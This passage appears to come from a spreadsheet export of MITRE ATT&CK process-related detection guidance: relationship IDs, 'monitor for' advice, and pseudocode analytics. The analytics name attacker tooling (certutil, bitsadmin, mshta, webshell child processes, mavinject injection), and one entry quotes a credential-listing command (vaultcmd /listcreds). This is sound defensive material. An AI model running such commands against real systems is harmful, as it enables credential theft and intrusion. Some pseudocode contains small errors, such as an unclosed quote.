  </si>
  <si>
    <t>relationship--ef287141-fdb9-4440-8721-f53041828597</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</si>
  <si>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</si>
  <si>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relationship--658b16c0-1d63-48f0-8ea6-461410088ca1</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications.</t>
  </si>
  <si>
    <t>relationship--cda14004-4ea7-4c25-9ef2-ca370d869894</t>
  </si>
  <si>
    <t>Monitor for common cryptomining or proxyware software process names that may indicate compromise and resource usage.</t>
  </si>
  <si>
    <t>relationship--c31f9082-3dc3-48e6-9897-99f26a60b63b</t>
  </si>
  <si>
    <t>Monitor newly executed processes associated with running a virtual instance, such as those launched from binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V).</t>
  </si>
  <si>
    <t>relationship--9df02934-ee06-4c63-8f27-00b88f615a26</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</si>
  <si>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&lt;h4&gt;Analytic 1 - RunDLL32.exe Monitoring &lt;/h4&gt; 
&lt;code&gt; processes = filter process where ((event_id == "1" OR event_id == "4688") AND exe == "rundll32.exe")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--02a92b76-50e8-4d63-a7e3-462ff2596cbf</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Basic&lt;/h4&gt; 
&lt;code&gt;suspicious_smb_traffic = filter processes where((event_id = “4688” or event_id = “1”) AND parent_process_name = “wmiprvse.exe” AND targetlogonid = “0x3e7”)&lt;/code&gt;
</t>
  </si>
  <si>
    <t>relationship--d009f8e4-3978-483c-ad56-09d9f3734562</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</si>
  <si>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</si>
  <si>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relationship--3863f565-a654-45ad-8fb9-43d016d9b8a4</t>
  </si>
  <si>
    <t>Monitor for suspicious processes modifying the authorized_keys or /etc/ssh/sshd_config files.</t>
  </si>
  <si>
    <t>relationship--4789380f-30ac-4a85-b857-cd7d3a546d98</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may hijack a legitimate user's SSH session to move laterally within an environment.</t>
  </si>
  <si>
    <t>relationship--3618780c-4199-465e-931e-812489d3a8ad</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may abuse Windows safe mode to disable endpoint defenses.</t>
  </si>
  <si>
    <t>relationship--3ab344fd-eb65-413d-a942-37336d25bd10</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</si>
  <si>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processes whose parent processes are svchost.exe or taskeng.exe&lt;/h4&gt;
&lt;code&gt; suspicious_processes = filter ProcessId, ProcessFilePath, ProcessParentFilePath where
  (EventId == "1" OR EventId == "4688") AND
  (ProcessParentFilePath LIKE '%svchost.exe%' OR ProcessParentFilePath LIKE '%taskeng.exe%')&lt;/code&gt;
&lt;h4&gt; Analytic 2 - Scheduled Task Creation or Modification Containing Suspicious Scripts, Extensions or User Writable Paths &lt;/h4&gt;
&lt;code&gt;susp_tasks_processes = filter processes where command_line CONTAINS("*SCHTASKS*") 
AND (command_line CONTAINS("*/CREATE*") OR command_line CONTAINS("*/CHANGE*")) 
AND (command_line CONTAINS("*.cmd*") OR command_line CONTAINS("*.ps1*") OR command_line CONTAINS("*.vbs*") OR command_line CONTAINS("*.py*") OR command_line CONTAINS("*.js*") OR command_line CONTAINS("*.exe*") OR command_line CONTAINS("*.bat*") OR (command_line CONTAINS("*javascript*") OR command_line CONTAINS("*powershell*") OR command_line CONTAINS("*wmic*") OR command_line CONTAINS("*rundll32*") OR command_line CONTAINS("*cmd*") OR command_line CONTAINS("*cscript*") OR command_line CONTAINS("*wscript*") OR command_line CONTAINS("*regsvr32*") OR command_line CONTAINS("*mshta*") OR command_line CONTAINS("*bitsadmin*") OR command_line CONTAINS("*certutil*") OR command_line CONTAINS("*msiexec*") OR command_line CONTAINS("*javaw*") OR (command_line CONTAINS("*%APPDATA%*") OR command_line CONTAINS("*\\AppData\\Roaming*") OR command_line CONTAINS("*%PUBLIC%*") OR command_line CONTAINS("*C:\\Users\\Public*") OR command_line CONTAINS("*%ProgramData%*") OR command_line CONTAINS("*C:\\ProgramData*") OR command_line CONTAINS("*%TEMP%*") OR command_line CONTAINS("*\\AppData\\Local\\Temp*") OR command_line CONTAINS("*\\Windows\\PLA\\System*") OR command_line CONTAINS("*\\tasks*") OR command_line CONTAINS("*\\Registration\\CRMLog*") OR command_line CONTAINS("*\\FxsTmp*") OR command_line CONTAINS("*\\spool\\drivers\\color*") OR command_line CONTAINS("*\\tracing*"))))
tasks = search Task:create
susp_tasks = filter tasks where (task_content CONTAINS("*.cmd*") OR task_content CONTAINS("*.ps1*") OR task_content CONTAINS("*.vbs*") OR task_content CONTAINS("*.py*") OR task_content CONTAINS("*.js*") OR task_content CONTAINS("*.exe*") OR task_content CONTAINS("*.bat*") OR (task_content CONTAINS("*javascript*") OR task_content CONTAINS("*powershell*") OR task_content CONTAINS("*wmic*") OR task_content CONTAINS("*rundll32*") OR task_content CONTAINS("*cmd*") OR task_content CONTAINS("*cscript*") OR task_content CONTAINS("*wscript*") OR task_content CONTAINS("*regsvr32*") OR task_content CONTAINS("*mshta*") OR task_content CONTAINS("*bitsadmin*") OR task_content CONTAINS("*certutil*") OR task_content CONTAINS("*msiexec*") OR task_content CONTAINS("*javaw*") OR (task_content CONTAINS("*%APPDATA%*") OR task_content CONTAINS("*\\AppData\\Roaming*") OR task_content CONTAINS("*%PUBLIC%*") OR task_content CONTAINS("*C:\\Users\\Public*") OR task_content CONTAINS("*%ProgramData%*") OR task_content CONTAINS("*C:\\ProgramData*") OR task_content CONTAINS("*%TEMP%*") OR task_content CONTAINS("*\\AppData\\Local\\Temp*") OR task_content CONTAINS("*\\Windows\\PLA\\System*") OR task_content CONTAINS("*\\tasks*") OR task_content CONTAINS("*\\Registration\\CRMLog*") OR task_content CONTAINS("*\\FxsTmp*") OR task_content CONTAINS("*\\spool\\drivers\\color*") OR task_content CONTAINS("*\\tracing*"))))&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--4d8cabd5-3985-42a1-9457-047858ff340f</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.</t>
  </si>
  <si>
    <t>relationship--44a9703a-b4de-45d6-94c6-18fdd77c8487</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor newly executed processes that may establish persistence by executing malicious content triggered by user inactivity.
&lt;h4&gt; Analytic 1 : New processes whose image files are being used as Screensaver files and make an outbound network connection to unknown IP address &lt;/h4&gt;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</si>
  <si>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relationship--db85d274-4717-4b55-b5b6-8a1d2100ca2e</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.</t>
  </si>
  <si>
    <t>relationship--230f8736-0a83-4a6d-96db-ed88188e37d2</t>
  </si>
  <si>
    <t>Process monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files.</t>
  </si>
  <si>
    <t>relationship--c7638d76-0bff-4a9b-9822-63f4e9e6cd4c</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may abuse the Windows service control manager to execute malicious commands or payloads.</t>
  </si>
  <si>
    <t>relationship--df59e897-15ee-451c-8d6f-9d125e9c127d</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may stop or disable services on a system to render those services unavailable to legitimate users.</t>
  </si>
  <si>
    <t>relationship--060535c1-196e-487d-8294-122c3c07ccd8</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may execute their own malicious payloads by hijacking the binaries used by services.</t>
  </si>
  <si>
    <t>relationship--69ec32e4-3092-4e7a-941f-748f6a13d1dc</t>
  </si>
  <si>
    <t>Monitor suspicious programs execution through services. These processes may show up as outlier processes that have not been seen before when compared against historical data.</t>
  </si>
  <si>
    <t>relationship--d1ae7dee-ba9d-4988-bd9e-eff2fe8b0cd2</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may create or edit shortcuts to run a program during system boot or user login.</t>
  </si>
  <si>
    <t>relationship--0f303334-5453-4415-a5e0-cf039f59796a</t>
  </si>
  <si>
    <t>relationship--54f798f6-b340-4188-b8a2-b09d2c5699c4</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</si>
  <si>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</si>
  <si>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relationship--8662e715-6410-40cf-8faa-21b186073a7d</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment.</t>
  </si>
  <si>
    <t>relationship--9e837354-a6d0-4d0d-b2cd-43e3f89222c9</t>
  </si>
  <si>
    <t>Consider monitoring for suspicious processes that may be spoofing security tools and monitoring messages.</t>
  </si>
  <si>
    <t>relationship--d58da13b-aba4-440a-8d15-d0fee9a7a39b</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines that execute during the boot up process to check for unusual or unknown applications and behavior</t>
  </si>
  <si>
    <t>relationship--5c9c3368-ff0e-4f3a-ae9f-5b78785984b9</t>
  </si>
  <si>
    <t>Monitor processes and arguments for malicious attempts to modify trust settings, such as the installation of root certificates or modifications to trust attributes/policies applied to files.</t>
  </si>
  <si>
    <t>relationship--8a2a174b-c45c-4241-b773-c3d42513223d</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may perform sudo caching and/or use the suoders file to elevate privileges.</t>
  </si>
  <si>
    <t>relationship--9b5d73dd-745c-4b4f-b6e6-55c86cc3b6ca</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</si>
  <si>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</si>
  <si>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relationship--d5f85a11-2c62-4e16-afd5-e093cd35d5f0</t>
  </si>
  <si>
    <t>relationship--60b62d1a-c6f2-4105-97fd-40194442a4c3</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.</t>
  </si>
  <si>
    <t>relationship--8ae4334c-0c17-406e-9778-e9bf38342f04</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.</t>
  </si>
  <si>
    <t>relationship--214e08d2-c8e2-4329-bd28-629058593cce</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may gather information in an attempt to calculate the geographical location of a victim host.</t>
  </si>
  <si>
    <t>relationship--593ab072-9083-4ff4-bc9e-adf29163cfb7</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</si>
  <si>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&lt;h4&gt; Analytic 1 - Suspicious Process &lt;/h4&gt;
&lt;code&gt; processes = filter processes where (
  (event_id == "1" OR event_id == "4688") AND 
   exe == "C:\Windows\System32\ipconfig.exe" OR 
   exe == "C:\Windows\System32\route.exe" OR 
   exe == "C:\Windows\System32\nbtstat.exe") &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--95f6f70c-b48a-4aa2-8c9e-fc680bf75f01</t>
  </si>
  <si>
    <t>Monitor for executed processes that may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.</t>
  </si>
  <si>
    <t>relationship--d7dd5b7c-2548-41f5-bfc7-4aaa4af31b36</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</si>
  <si>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&lt;h4&gt; Analytic 1 - Suspicious Process Execution&lt;/h4&gt;
&lt;code&gt; processes = filter processes where (
  (event_id == "1" OR event_id == "4688") AND
  exe == "at.exe") &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--8e6b0e34-a33c-4a04-bbe8-bb1b73894167</t>
  </si>
  <si>
    <t>relationship--63df0dac-898b-4d5c-8c97-1f4c6ae650ba</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</si>
  <si>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&lt;h4&gt; Analytic 1 -  Suspicious Processes &lt;/h4&gt;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t>
  </si>
  <si>
    <t>relationship--a700e6c3-ee0a-4eb9-9f1a-4ce741d04837</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may abuse system services or daemons to execute commands or programs.</t>
  </si>
  <si>
    <t>relationship--8beed6cd-0a69-47b3-9c4e-f4cc3c4dfaa2</t>
  </si>
  <si>
    <t>Monitor for newly executed processes of binaries involved in shutting down or rebooting systems.</t>
  </si>
  <si>
    <t>relationship--3ee67749-9979-4490-b984-1aa962326109</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may gather the system time and/or time zone from a local or remote system.</t>
  </si>
  <si>
    <t>relationship--fb83a9d5-0608-4008-a16a-dbfeac84e177</t>
  </si>
  <si>
    <t>Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.</t>
  </si>
  <si>
    <t>relationship--ca80e49f-7129-43bc-ad58-5521f03b737c</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines that will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.</t>
  </si>
  <si>
    <t>relationship--9cb75506-505c-49b9-9162-c79c2c069244</t>
  </si>
  <si>
    <t>Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.</t>
  </si>
  <si>
    <t>relationship--a360fa6b-8b36-4401-b717-436badd67476</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</si>
  <si>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</si>
  <si>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relationship--4a633d63-4651-4b40-b118-91d1e779247c</t>
  </si>
  <si>
    <t>Monitor processes with arguments that may potentially highlight adversary actions to modify Registry values (ex: &lt;code&gt;reg.exe&lt;/code&gt;) or modify/replace the legitimate &lt;code&gt;termsrv.dll&lt;/code&gt;.</t>
  </si>
  <si>
    <t>relationship--be0a5404-5c19-4c22-b152-651a7e86ab11</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</si>
  <si>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</si>
  <si>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relationship--7292fecb-86cc-4e0b-9e46-b8535f68e05e</t>
  </si>
  <si>
    <t>Monitor newly executed processes, such as the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>relationship--4532058c-bdc1-4911-8749-d235f60bd684</t>
  </si>
  <si>
    <t>relationship--c4c9ecf8-168e-41b6-ad98-f3bf7d8927bf</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may establish persistence by executing malicious content triggered by an interrupt signal.</t>
  </si>
  <si>
    <t>relationship--585d81e2-c7d9-4711-9dfc-71b422cf0f7a</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</si>
  <si>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</si>
  <si>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relationship--b069525d-194a-4bfb-a6f1-ad024a480e0b</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may abuse Unix shell commands and scripts for execution.</t>
  </si>
  <si>
    <t>relationship--1e20ce68-4062-4993-a89e-93bca3dbbdc4</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may establish persistence through executing malicious commands triggered by a user’s shell.</t>
  </si>
  <si>
    <t>relationship--17558f0e-3f37-4bc9-9dd9-e2ace1b337c5</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may search compromised systems to find and obtain insecurely stored credentials.</t>
  </si>
  <si>
    <t>relationship--ad1dbd46-fe1c-40e3-ab1c-957f6d62839a</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</si>
  <si>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</si>
  <si>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relationship--826b91bd-58f4-406b-91cc-7cac59156969</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</si>
  <si>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</si>
  <si>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relationship--b928ec41-185a-4ced-ad73-aa16aef857fc</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</si>
  <si>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</si>
  <si>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relationship--6e29a022-0d70-4176-b2ad-63bec58e474d</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</si>
  <si>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</si>
  <si>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relationship--1d57f09c-0797-431b-b2f2-7a240df97e96</t>
  </si>
  <si>
    <t>relationship--ac2d8c2a-72f7-4fa4-9996-d520123a0fa1</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</si>
  <si>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</si>
  <si>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relationship--72677f7d-063a-45bb-9c29-646af42f1be3</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Webshell-Indicative Process Tree&lt;/h4&gt;
&lt;code&gt;suspicious_processes = filter processes where (
  (parent_exe == "w3wp.exe" OR
   parent_exe == "httpd.exe" OR
   parent_exe == "tomcat*.exe" OR
   parent_exe == "nginx.exe" ) AND
  (exe == "cmd.exe" OR
   exe == "powershell.exe" OR
   exe == "net.exe" OR
   exe == "whoami.exe" OR
   exe == "hostname.exe" OR
   exe == "systeminfo.exe" OR
   exe == "ipconfig.exe) )&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--2610bdef-0b08-46a8-94f5-cf253f11e5fc</t>
  </si>
  <si>
    <t>10 November 2023</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may abuse the Windows command shell for execution.
Note: This Analytic works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&lt;h4&gt;Analytic 1&lt;/h4&gt;
&lt;code&gt;cmd == filter processes where ((event_id == "1" OR event_id == "4688") AND exe == "cmd.exe")
cmd == from cmd select parent_exe
historic_cmd == filter cmd (where timestamp &lt; now - 1 day AND timestamp &gt; now - 1 day)
current_cmd == filter cmd (where timestamp &gt;= now - 1 day)
new_cmd == historic_cmd - current_cmd &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--ff4cd6a5-1261-4f64-9f27-3507147be7ec</t>
  </si>
  <si>
    <t>Monitor newly executed processes for suspicious activity listing credentials from the Windows Credentials locker (e.g. &lt;code&gt;vaultcmd /listcreds:“Windows Credentials”&lt;/code&gt;).(Citation: Malwarebytes The Windows Vault)</t>
  </si>
  <si>
    <t>relationship--da87f8fe-9644-4e97-b764-d570910e9e4e</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines that can interact with the DACLs using built-in Windows commands, such as icacls, cacls, takeown, and attrib, which can grant adversaries higher permissions on specific files and folders.</t>
  </si>
  <si>
    <t>relationship--66607dcd-372d-4906-8b11-062edeeceace</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</si>
  <si>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&lt;h4&gt; Analytic 1 : Create Remote Process via WMIC&lt;/h4&gt;
&lt;code&gt; processes = filter processes where ((event_id="10" OR event_id="4688") AND exe == "wmic.exe" AND command_line == "* process call create *")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--d4231fe6-3a2d-45b7-bb71-68f285373a41</t>
  </si>
  <si>
    <t>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WmiPrvSe.exe.</t>
  </si>
  <si>
    <t>relationship--9567076b-2a77-43e4-befd-19556def9d47</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM), as well as service processes such as &lt;code&gt;wmiprvse.exe&lt;/code&gt; on destination hosts.</t>
  </si>
  <si>
    <t>relationship--52220a00-bd7f-4a24-a5d3-8ac40ab1ffdd</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</si>
  <si>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&lt;h4&gt; Analytic 1 : Service Outlier Executables &lt;/h4&gt;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Analytic 2 : Services launching CMD &lt;/h4&gt; 
&lt;code&gt; suspicious_processes = filter processes where
  (event_id == "1" OR event_id == "4688") AND
  (exe == "cmd.exe" and parent_exe == "services.exe")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--4ebce143-6b85-4188-a8ea-010045c48bdd</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may modify XDG autostart entries to execute programs or commands during system boot.</t>
  </si>
  <si>
    <t>relationship--858fea59-2a4e-4951-9c42-3e011db2e615</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</si>
  <si>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</si>
  <si>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relationship--7a1e325a-a1ca-47cb-97fa-8275bfb3c201</t>
  </si>
  <si>
    <t>Process Metadata</t>
  </si>
  <si>
    <t>x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1</t>
  </si>
  <si>
    <t>Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner that may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions.</t>
  </si>
  <si>
    <t>relationship--82cd9140-2e98-49cb-bfc8-62a7b7a57943</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</si>
  <si>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</si>
  <si>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relationship--d5b776e8-d31c-4911-accc-72e07f81a52c</t>
  </si>
  <si>
    <t>Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner that may bypass UAC mechanisms to elevate process privileges on system.</t>
  </si>
  <si>
    <t>relationship--cae4a73c-25e9-4f2c-9a89-00c17f78c05c</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</si>
  <si>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</si>
  <si>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relationship--3753e580-0ea6-4bf4-a1bc-c61467f038a8</t>
  </si>
  <si>
    <t>Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow.</t>
  </si>
  <si>
    <t>relationship--2c0f2d17-0f48-476b-82d2-6df2c89234ab</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</si>
  <si>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</si>
  <si>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relationship--9d035ede-612d-4919-9a69-0e4087e786cf</t>
  </si>
  <si>
    <t>Monitor for process memory inconsistencies compared to DLL files on disk by checking memory ranges against a known copy of the legitimate module.(Citation: Hiding Malicious Code with Module Stomping)</t>
  </si>
  <si>
    <t>relationship--1d87dc81-d091-4c30-be81-1c741f722296</t>
  </si>
  <si>
    <t>14 July 2022</t>
  </si>
  <si>
    <t>relationship--a6bc0492-4d72-4010-b5c5-2a636bb284d7</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for file names that are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. </t>
  </si>
  <si>
    <t>relationship--35d9e191-e069-47f4-bce9-750eb9234c0c</t>
  </si>
  <si>
    <t>relationship--3f1681dd-555a-42e0-80c0-9b4ad1d6feb8</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</si>
  <si>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</si>
  <si>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relationship--ac7af437-b8ff-4b43-af49-841a391f104c</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</si>
  <si>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</si>
  <si>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relationship--c17b66a9-2911-4f5a-b954-54d881f79dbd</t>
  </si>
  <si>
    <t>Monitor for process memory inconsistencies, such as checking memory ranges against a known copy of the legitimate module.(Citation: Hiding Malicious Code with Module Stomping)</t>
  </si>
  <si>
    <t>relationship--7b6fce79-ae35-4a32-8463-63aa9dba97d6</t>
  </si>
  <si>
    <t>relationship--8426f102-542c-470b-8c9e-4227c1d16f65</t>
  </si>
  <si>
    <t>Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner that may perform sudo caching and/or use the suoders file to elevate privileges.</t>
  </si>
  <si>
    <t>relationship--adfb3bef-264c-46c7-ac54-de9a0ac382b7</t>
  </si>
  <si>
    <t>Process Modification</t>
  </si>
  <si>
    <t>x-mitre-data-component--d5fca4e4-e47a-487b-873f-3d22f8865e96</t>
  </si>
  <si>
    <t>Monitor for changes made to processes that may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>relationship--6ec972d2-50fb-4391-84ec-284995b2c389</t>
  </si>
  <si>
    <t>relationship--00fa545f-2333-4ae8-8f59-3fbb56e68d43</t>
  </si>
  <si>
    <t>Using another process or third-party tools, monitor for potentially malicious modifications or access to the `auditd` system process.</t>
  </si>
  <si>
    <t>relationship--f7623469-eae6-4554-a1d2-35f6ed3a243b</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</si>
  <si>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&lt;h4&gt;Analytic 1 - DLL Injection with Mavinject &lt;/h4&gt;
&lt;code&gt;mavinject_processes = filter processes where (
  exe = "C:\\Windows\\SysWOW64\\mavinject.exe" OR Image="C:\\Windows\\System32\\mavinject.exe" OR command_line = "*/INJECTRUNNING*"&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--c64f3e5f-6be9-45ec-8669-5b79c479030d</t>
  </si>
  <si>
    <t>Using another process or third-party tools, monitor for modifications or access to system processes associated with logging.</t>
  </si>
  <si>
    <t>relationship--69a330cc-a89d-400b-9976-c5d29a2c8f92</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</si>
  <si>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</si>
  <si>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relationship--4a69be0a-65c1-4236-bb97-a6a37237ba34</t>
  </si>
  <si>
    <t>Monitor for changes made to processes that may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>relationship--b62e23ad-28b5-43ba-b036-bf6a9cfa9d00</t>
  </si>
  <si>
    <t>Monitor for changes made to processes that may inject malicious code into suspended and hollowed processes in order to evade process-based defenses.</t>
  </si>
  <si>
    <t>relationship--5b727375-1e59-4469-8cca-b4468aff9860</t>
  </si>
  <si>
    <t>Monitor for changes made to processes that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>relationship--6397a3a8-68bb-46bd-b5b8-f0ed56783e56</t>
  </si>
  <si>
    <t>Monitor for changes made to processes that may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>relationship--790f6fe2-1b72-4e6f-be23-1ff427fab077</t>
  </si>
  <si>
    <t>Monitor for changes made to processes that may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>relationship--b1d2af9e-7d5a-4809-b88b-e192fb138ea3</t>
  </si>
  <si>
    <t>Monitor for changes made to processes that may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>relationship--b54d9a2c-2d93-41b1-b987-9520d2e22fbb</t>
  </si>
  <si>
    <t>Process Termination</t>
  </si>
  <si>
    <t>x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f</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</si>
  <si>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</si>
  <si>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relationship--2ed8a8c7-2b1b-4bac-bc35-4d4fad2284b7</t>
  </si>
  <si>
    <t>Monitor for unexpected deletions of a running process (ex: Sysmon EID 5 or Windows EID 4689) that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.</t>
  </si>
  <si>
    <t>relationship--71c5ab4c-c567-4043-aa8b-3b83a4eb5808</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if critical processes are terminated or stop running.</t>
  </si>
  <si>
    <t>relationship--0e70e0ae-e2ef-4bba-9616-9dedd18d09a4</t>
  </si>
  <si>
    <t>Response Content</t>
  </si>
  <si>
    <t>x-mitre-data-component--0dcbbf4f-929c-489a-b66b-9b820d3f7f0e</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</si>
  <si>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</si>
  <si>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relationship--82c3c7bc-b0dd-46f6-97fb-3aef732f6d21</t>
  </si>
  <si>
    <t>attack-pattern--774ad5bb-2366-4c13-a8a9-65e50b292e7c</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</si>
  <si>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</si>
  <si>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relationship--0c7c9d79-016b-4b53-8a72-7594604676bd</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</si>
  <si>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</si>
  <si>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relationship--1058a1db-b8c5-47d0-b9ac-3178018f1542</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</si>
  <si>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</si>
  <si>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relationship--b597a9fa-34d7-4f35-870e-dd9b082619b2</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</si>
  <si>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</si>
  <si>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relationship--f783c5c8-0620-4fb0-9e8f-55df960cf41c</t>
  </si>
  <si>
    <t>attack-pattern--1cec9319-743b-4840-bb65-431547bce82a</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</si>
  <si>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</si>
  <si>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relationship--fecb150a-6c94-4e57-80d3-d9e8caffffe1</t>
  </si>
  <si>
    <t>attack-pattern--31fe0ba2-62fd-4fd9-9293-4043d84f7fe9</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</si>
  <si>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</si>
  <si>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relationship--2f7250d7-6a05-4786-baf0-9044dcbd2937</t>
  </si>
  <si>
    <t>attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f</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</si>
  <si>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</si>
  <si>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relationship--31eec307-641b-429e-a93f-978512986585</t>
  </si>
  <si>
    <t>attack-pattern--24286c33-d4a4-4419-85c2-1d094a896c26</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</si>
  <si>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</si>
  <si>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relationship--21859ef1-0c9f-4dc5-a4d8-0613d3636c83</t>
  </si>
  <si>
    <t>attack-pattern--c071d8c1-3b3a-4f22-9407-ca4e96921069</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</si>
  <si>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</si>
  <si>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relationship--d4e20b18-2cea-44a7-98c1-ffabea1f4f68</t>
  </si>
  <si>
    <t>attack-pattern--84ae8255-b4f4-4237-b5c5-e717405a9701</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</si>
  <si>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</si>
  <si>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relationship--9c064dc7-6c3e-4fdd-98f3-205c34315ac5</t>
  </si>
  <si>
    <t>attack-pattern--155207c0-7f53-4f13-a06b-0a9907ef5096</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</si>
  <si>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</si>
  <si>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relationship--240bb721-0dc0-472a-ac81-01348e573015</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</si>
  <si>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</si>
  <si>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relationship--818e07c2-4052-4f92-91a9-5c3f2633a8ac</t>
  </si>
  <si>
    <t>attack-pattern--e5d550f3-2202-4634-85f2-4a200a1d49b3</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</si>
  <si>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</si>
  <si>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relationship--015ff4c9-437e-4f49-b125-42e49ebda226</t>
  </si>
  <si>
    <t>attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337</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</si>
  <si>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</si>
  <si>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relationship--9d916b31-4d81-4f48-9929-ea2cb0313a42</t>
  </si>
  <si>
    <t>attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5</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</si>
  <si>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</si>
  <si>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relationship--d809d062-9fe3-4058-b12b-56ba196a24db</t>
  </si>
  <si>
    <t>attack-pattern--04a5a8ab-3bc8-4c83-95c9-55274a89786d</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</si>
  <si>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</si>
  <si>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relationship--85129fbd-3b2f-4cc5-af3d-1d9c1dd8cdab</t>
  </si>
  <si>
    <t>attack-pattern--df1bc34d-1634-4c93-b89e-8120994fce77</t>
  </si>
  <si>
    <t>relationship--3cca2613-73d6-4c2a-b3c8-8824b682d157</t>
  </si>
  <si>
    <t>attack-pattern--baf60e1a-afe5-4d31-830f-1b1ba2351884</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</si>
  <si>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</si>
  <si>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relationship--94dcf9ee-b094-42b3-b410-b4f54be0db8f</t>
  </si>
  <si>
    <t>attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0</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</si>
  <si>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</si>
  <si>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relationship--cbbaed8a-28ce-4cea-bbb9-ea200dcf9e66</t>
  </si>
  <si>
    <t>attack-pattern--3ee16395-03f0-4690-a32e-69ce9ada0f9e</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</si>
  <si>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</si>
  <si>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relationship--485e7842-97ea-4c4a-bf73-5dd084434b7c</t>
  </si>
  <si>
    <t>attack-pattern--506f6f49-7045-4156-9007-7474cb44ad6d</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</si>
  <si>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</si>
  <si>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relationship--aa283df3-ef43-4eae-8137-d397f4a0595d</t>
  </si>
  <si>
    <t>attack-pattern--39cc9f64-cf74-4a48-a4d8-fe98c54a02e0</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</si>
  <si>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</si>
  <si>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relationship--4e937803-036e-4e3c-9b42-14b8e241e487</t>
  </si>
  <si>
    <t>attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795</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</si>
  <si>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</si>
  <si>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relationship--9775ca4e-c615-4d54-bf34-fec137933cf6</t>
  </si>
  <si>
    <t>attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54</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</si>
  <si>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</si>
  <si>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relationship--59e05166-d274-4cf3-b9f1-f5e17755eb0e</t>
  </si>
  <si>
    <t>attack-pattern--ae797531-3219-49a4-bccf-324ad7a4c7b2</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</si>
  <si>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</si>
  <si>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relationship--989faaf2-96cd-4865-b5e2-b40aec769183</t>
  </si>
  <si>
    <t>Response Metadata</t>
  </si>
  <si>
